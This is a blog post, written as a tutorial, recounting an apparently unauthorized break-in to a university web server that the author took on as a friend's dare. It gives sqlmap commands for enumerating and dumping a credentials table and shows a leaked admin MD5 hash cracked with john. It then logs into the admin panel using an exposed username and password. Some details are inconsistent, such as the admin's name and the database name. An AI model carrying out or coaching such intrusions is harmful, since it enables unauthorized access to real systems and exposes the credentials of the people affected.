Scenario a1

Hello every body and welcome to my first topic in this blog :) .

Before two weeks ago , I've received an e-mail from my friend telling me that he wants me to penetrate a university server as a challenge holding inside of it more than 100 website associated to each other , I thought at the first moment that he was just joking :P , however , I accepted the challenge and I told him to send me back the site name .

I've taken the subject in seriously . I started to think , from where to begin ?
what tools are possible for using ? , if the server infected of any kind of bugs or not ? . Simply I said , lets make some noise around ;) .

Before embarking for doing anything , first , I'd like to mention two things of my opinion:

1 - in the information security perspective there is no place for impatient people , if you exceed the first step then the second should be possible to overcome also the rests , don't say I get bored , try harder :) or go eat some cornflakes with yourself :P .

2 - the penetration testing doesn't have any restrictions , just be creative , any firewalls , IDS's , AV's , filtrations techniques are possible to brake in , if not then go to your rommate look in the mirror open your eyes and whistle like I don't care :0 .

Before embarking for doing anything , i'd like to mention that in this tutorial all the commands and the images has been applied on kali distribution .

Lets do a quick scan using Acunetix scanner on the ip , take alook at the image down below :

the web server is Nginx/1.4.1 , no Apache server is running at all (might be)
another try via www.netcraft.com website it might give us other results :

Os is Linux based , so far so good , lets turn to the next step which is find as much as possible any kind of vulnerabilities such as SQLi , Xss and so on .

I have the site name but i can't expose it in order to prevent any kind of sabotage doings because this topic is just a tutorial material for educational purposes only .

However , while am navigating inside the server I've found a website infected in two well-known vulns and classified of top 10 OWASP vulns , SQLi and Xss , take alook :

seems to be very interesting and many would says 'Game Over' but not yet lets see what is next :

marvelous job , now we are in two issues , if you want to attack this site using Xss vuln then it is your choice and the pentesters today are very familiar with this kind of attacks , you could use a java-based attacks since this types of vulns are very comfortable with java , or you could use SQLi for a quick and more reliable results , despite of the strength of these two types , SQLi still the most popular attack in the information security perspective .

Ok , very well , here you could think of two choices , first one , use your hands to inject the parameter , second is to automate this process by using any kind of tools like sqlmap for example .

In this topic I'am going to use sqlmap for the mission , let me ask first Kali for a help , " Kali , would you please help us here while we are doing a penetration testing job " , " definitely yes , they made me for this purpose buddies :) " , " Thanks alot Kali , you are the best of the best ",
Hhhhe ;) .

Thus , we took the permission now lets turn to a robust job :

very nice , we've got an injectable parameter , DB is mysql 5.0.11 , PHP 5.2.6 , web server banner Nginx , good , now lets enumerate the databases :

we've got two databases :
1 - information_schema
2 - user1151_lgxrt2
the 2nd is the important db , now turn to enumerate the tables and the columns , simple type this command :

" sqlmap -u "http" --tables -D (or --dbs for all) user1151_lgxrt2 "

as shown above we've already seen the tables , the referred to by a red arrow is the important table , lets see it columns :

so far so good , those are the nex_autentification columns but we're interested just in three of them :

ify_id
ify_reg_user
ify_reg_pass .

Ok , time to dump the columns data , very simple just type the following command :

sqlmap -u "http" --dump -T nex_autentification -D user1151_lgxr2 --time-sec=1

Wonderful !! , the administrator data has been completely exposed :

Id : 2
User : Administrator
Pass : b335044809c08dfc082baac961426676

last but not least , we need to crack the admin hash which is md5 , you have 3 common ways of thousands choices to crack this type of hashs :

1- john the ripper
2- rainbow tables
3- online websites

If you want to crack it by using john , put your md5 inside a file then save it and type as following into your terminal :

john --format=raw-md5 file

The 2nd way is the rainbow tables and the worst thing in it is the huge size of the tables it could reach more than 10 gb for each one despite of it credibility , go navigate into this website :

https://www.freerainbowtables.com/ .

However , lets crack the hash and see the result :

Alright guys , it says it resolves to " enigma390 "we've made the half of the job , now between our hands a cracked md5 , so , the user if you remember is " Andrey " and the password is " enigma390" lets spider the host to see where is the admin login page , just use your own tools doesn't matter , all gives the same result , this image from havij program :

But when i opened the url path it's appeared to be a phpmyadmin page , take alook at this :

I've tried everything every way to phish the admin page , but here is the way , suddenly i've got an idea , you remember when we were injecting the parameter and we've seen all the tables , columns and the data , it has been shown to me that the prefix on each tables is the main page for the admin and here is the proof :

Voilaaaaaa :) , magnificent , lets login using the previous data :

User : Andrey
Pass : enigma390

Thats it guys , we've seen a very modest scenario .

Next time i'll show you how to compromise the server by hijacking an ssl login account , see you soon , to be continued :) .